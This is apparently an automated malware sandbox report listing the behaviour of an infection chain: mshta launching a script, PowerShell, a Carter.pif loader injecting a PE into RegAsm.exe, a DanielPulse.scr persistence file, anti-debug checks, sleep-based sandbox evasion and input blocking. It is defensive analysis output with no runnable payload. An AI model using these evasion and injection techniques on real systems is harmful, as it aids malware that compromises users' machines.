Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Memory allocated: 2A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Memory allocated: 4C10000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2951	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5361	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3656	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1292	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6899
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2566
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Window / User API: threadDelayed 3664
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Window / User API: threadDelayed 1201
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Window / User API: threadDelayed 8600

Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	API coverage: 4.7 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep count: 2951 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532	Thread sleep count: 5361 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep count: 3656 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep count: 1292 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8056	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1720	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8708	Thread sleep count: 6899 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8712	Thread sleep count: 2566 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8748	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif TID: 9176	Thread sleep time: -36640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 7136	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 8724	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 8724	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 8740	Thread sleep count: 1201 > 30
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 8740	Thread sleep count: 8600 > 30

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Thread sleep count: Count: 3664 delay: -10

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_004062D5 FindFirstFileW,FindClose,	22_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_00402E18 FindFirstFileW,	22_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	22_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C54005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_00C54005
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5494A GetFileAttributesW,FindFirstFileW,FindClose,	32_2_00C5494A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C53CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_00C53CE2
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	32_2_00C5C2FF
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	32_2_00C5CD9F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5CD14 FindFirstFileW,FindClose,	32_2_00C5CD14
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_00C5F5D8
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_00C5F735
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C5FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	32_2_00C5FA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	40_2_00FB4005
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	40_2_00FBC2FF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FB494A GetFileAttributesW,FindFirstFileW,FindClose,	40_2_00FB494A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	40_2_00FBCD9F
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBCD14 FindFirstFileW,FindClose,	40_2_00FBCD14
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	40_2_00FBF5D8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	40_2_00FBF735
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FBFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	40_2_00FBFA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	40_2_00FB3CE2
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	42_2_00F24005
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	42_2_00F2C2FF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2494A GetFileAttributesW,FindFirstFileW,FindClose,	42_2_00F2494A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	42_2_00F2CD9F
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2CD14 FindFirstFileW,FindClose,	42_2_00F2CD14
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	42_2_00F2F5D8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	42_2_00F2F735
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	42_2_00F2FA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	42_2_00F23CE2

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C05D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

32_2_00C05D13

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\220239\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\220239
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\

Source: mshta.exe, 00000000.00000002.4143659814.00000000029B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: mshta.exe, 00000000.00000002.4143659814.00000000029F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3422415026.0000022C7CE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3421271194.0000022C7782B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Carter.pif, 00000020.00000002.4145246553.0000000001815000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.4144371742.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C645D5 BlockInput,

32_2_00C645D5

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

32_2_00C05240

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C25CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

32_2_00C25CAC

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 22_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

22_2_004062FC

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C488CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

32_2_00C488CD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_00C1A385
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1A354 SetUnhandledExceptionFilter,	32_2_00C1A354
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00F7A385
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7A354 SetUnhandledExceptionFilter,	40_2_00F7A354
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_00EEA385
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEA354 SetUnhandledExceptionFilter,	42_2_00EEA354

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Memory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 9E0000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Memory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 9E0000
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Memory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: B59000

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C49369 LogonUserW,

32_2_00C49369

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

32_2_00C05240

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C51AC6 SendInput,keybd_event,

32_2_00C51AC6

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C551E2 mouse_event,

32_2_00C551E2

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js"	Jump to behavior
